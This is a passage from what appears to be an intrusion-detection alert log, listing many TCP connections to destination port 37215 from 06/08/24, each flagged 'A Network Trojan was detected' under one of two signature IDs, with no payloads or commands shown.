          Source Port:49584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670126
          SID:2835222
          Source Port:33298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261003
          SID:2829579
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112487
          SID:2829579
          Source Port:35108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449681
          SID:2835222
          Source Port:52460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160911
          SID:2835222
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805082
          SID:2835222
          Source Port:34632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446436
          SID:2835222
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551703
          SID:2829579
          Source Port:56970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242530
          SID:2829579
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044224
          SID:2835222
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242591
          SID:2835222
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269163
          SID:2835222
          Source Port:50978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466124
          SID:2835222
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747971
          SID:2829579
          Source Port:59586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134153
          SID:2835222
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164408
          SID:2829579
          Source Port:54678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.793392
          SID:2835222
          Source Port:39506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599971
          SID:2829579
          Source Port:48090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744065
          SID:2835222
          Source Port:51470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462670
          SID:2829579
          Source Port:44744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464805
          SID:2835222
          Source Port:50890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602831
          SID:2835222
          Source Port:51008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446838
          SID:2835222
          Source Port:32818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857352
          SID:2829579
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811632
          SID:2829579
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016234
          SID:2829579
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841717
          SID:2829579
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749174
          SID:2835222
          Source Port:50742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912830
          SID:2829579
          Source Port:49460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468474
          SID:2829579
          Source Port:35388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019024
          SID:2829579
          Source Port:56846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461486
          SID:2835222
          Source Port:48352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109224
          SID:2829579
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109160
          SID:2835222
          Source Port:44340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021040
          SID:2835222
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787883
          SID:2829579
          Source Port:48712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883955
          SID:2835222
          Source Port:53908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891285
          SID:2829579
          Source Port:37176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465288
          SID:2829579
          Source Port:35338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798695
          SID:2829579
          Source Port:46174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511916
          SID:2835222
          Source Port:48408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107875
          SID:2829579
          Source Port:48848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742422
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237030
          SID:2829579
          Source Port:51690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742093
          SID:2835222
          Source Port:53584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460580
          SID:2835222
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155573
          SID:2829579
          Source Port:45328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161556
          SID:2829579
          Source Port:49424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729634
          SID:2829579
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108803
          SID:2835222
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240396
          SID:2829579
          Source Port:59048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269318
          SID:2829579
          Source Port:56684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599200
          SID:2829579
          Source Port:49634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.364884
          SID:2835222
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602883
          SID:2829579
          Source Port:50516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446228
          SID:2835222
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495576
          SID:2835222
          Source Port:39562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782828
          SID:2829579
          Source Port:46894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242480
          SID:2829579
          Source Port:51912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351351
          SID:2829579
          Source Port:45950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461015
          SID:2829579
          Source Port:48620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554262
          SID:2835222
          Source Port:40794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275650
          SID:2829579
          Source Port:44280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744527
          SID:2829579
          Source Port:51258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.833564
          SID:2835222
          Source Port:44958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603189
          SID:2829579
          Source Port:48762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272619
          SID:2829579
          Source Port:49744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394597
          SID:2835222
          Source Port:46974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517321
          SID:2835222
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176143
          SID:2829579
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509327
          SID:2829579
          Source Port:36708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471306
          SID:2829579
          Source Port:35580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783964
          SID:2829579
          Source Port:39130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188724
          SID:2835222
          Source Port:54060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176462
          SID:2835222
          Source Port:44080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857344
          SID:2829579
          Source Port:53882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168369
          SID:2829579
          Source Port:41332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159976
          SID:2829579
          Source Port:44048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549631
          SID:2835222
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449834
          SID:2835222
          Source Port:39906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797926
          SID:2829579
          Source Port:55362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353445
          SID:2829579
          Source Port:51898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517703
          SID:2829579
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737858
          SID:2835222
          Source Port:34450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410037
          SID:2835222
          Source Port:50752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787792
          SID:2835222
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396190
          SID:2835222
          Source Port:58424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730286
          SID:2835222
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465857
          SID:2835222
          Source Port:51450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729839
          SID:2829579
          Source Port:36228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811858
          SID:2835222
          Source Port:37880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467711
          SID:2835222
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855338
          SID:2829579
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016712
          SID:2829579
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099398
          SID:2829579
          Source Port:46646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161678
          SID:2835222
          Source Port:53480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552304
          SID:2829579
          Source Port:52934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786675
          SID:2829579
          Source Port:59010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793152
          SID:2835222
          Source Port:33512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267690
          SID:2835222
          Source Port:38238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517100
          SID:2835222
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266514
          SID:2835222
          Source Port:38824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672794
          SID:2829579
          Source Port:55224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110647
          SID:2829579
          Source Port:34564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264286
          SID:2829579
          Source Port:47392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155741
          SID:2829579
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895966
          SID:2835222
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087987
          SID:2835222
          Source Port:40372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150266
          SID:2835222
          Source Port:46446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136156
          SID:2835222
          Source Port:60398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106267
          SID:2829579
          Source Port:35100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044288
          SID:2829579
          Source Port:39478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242340
          SID:2829579
          Source Port:44766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444110
          SID:2835222
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673036
          SID:2829579
          Source Port:56112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819369
          SID:2835222
          Source Port:35590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911582
          SID:2835222
          Source Port:58764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601865
          SID:2829579
          Source Port:37648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729837
          SID:2829579
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241381
          SID:2835222
          Source Port:55098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707400
          SID:2829579
          Source Port:35998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887065
          SID:2835222
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732604
          SID:2835222
          Source Port:49194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668066
          SID:2829579
          Source Port:33162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041102
          SID:2829579
          Source Port:40052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157423
          SID:2829579
          Source Port:57900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668090
          SID:2835222
          Source Port:48398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669712
          SID:2829579
          Source Port:38024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043990
          SID:2829579
          Source Port:37938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733728
          SID:2829579
          Source Port:46406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816637
          SID:2829579
          Source Port:56966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892293
          SID:2835222
          Source Port:48612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673499
          SID:2835222
          Source Port:50416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378523
          SID:2835222
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160557
          SID:2835222
          Source Port:36888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155422
          SID:2835222
          Source Port:38780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114275
          SID:2829579
          Source Port:34418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356980
          SID:2829579
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350708
          SID:2835222
          Source Port:57868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446963
          SID:2835222
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353173
          SID:2829579
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130211
          SID:2835222
          Source Port:38964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780499
          SID:2829579
          Source Port:43782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177107
          SID:2829579
          Source Port:41352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740117
          SID:2835222
          Source Port:39536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352368
          SID:2835222
          Source Port:40296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271562
          SID:2829579
          Source Port:57894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444065
          SID:2835222
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744341
          SID:2835222
          Source Port:36352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853119
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159474
          SID:2835222
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892164
          SID:2835222
          Source Port:56218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020286
          SID:2829579
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843657
          SID:2835222
          Source Port:41168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353163
          SID:2835222
          Source Port:59198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442486
          SID:2829579
          Source Port:33088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258663
          SID:2835222
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354495
          SID:2829579
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262568
          SID:2829579
          Source Port:33536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040564
          SID:2829579
          Source Port:44832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747426
          SID:2829579
          Source Port:60016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056353
          SID:2829579
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099213
          SID:2829579
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731866
          SID:2835222
          Source Port:33018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732329
          SID:2829579
          Source Port:58982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306611
          SID:2835222
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737835
          SID:2829579
          Source Port:34300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670461
          SID:2835222
          Source Port:49176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823008
          SID:2829579
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731705
          SID:2835222
          Source Port:35226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407355
          SID:2829579
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175346
          SID:2829579
          Source Port:52138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020483
          SID:2835222
          Source Port:44122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513773
          SID:2835222
          Source Port:51914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071168
          SID:2835222
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511516
          SID:2835222
          Source Port:45708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464985
          SID:2835222
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732813
          SID:2835222
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888366
          SID:2829579
          Source Port:46852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296802
          SID:2835222
          Source Port:50762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514447
          SID:2835222
          Source Port:47654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174387
          SID:2835222
          Source Port:42572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111228
          SID:2829579
          Source Port:51966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157059
          SID:2835222
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850587
          SID:2829579
          Source Port:49376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912193
          SID:2835222
          Source Port:56892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057162
          SID:2829579
          Source Port:52222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135983
          SID:2835222
          Source Port:44750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188040
          SID:2835222
          Source Port:38814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857111
          SID:2835222
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170629
          SID:2835222
          Source Port:40532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108414
          SID:2835222
          Source Port:41706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039269
          SID:2829579
          Source Port:36492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019057
          SID:2829579
          Source Port:43392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509991
          SID:2829579
          Source Port:58714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738902
          SID:2835222
          Source Port:57368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355485
          SID:2835222
          Source Port:35636
          Destination Port:37215
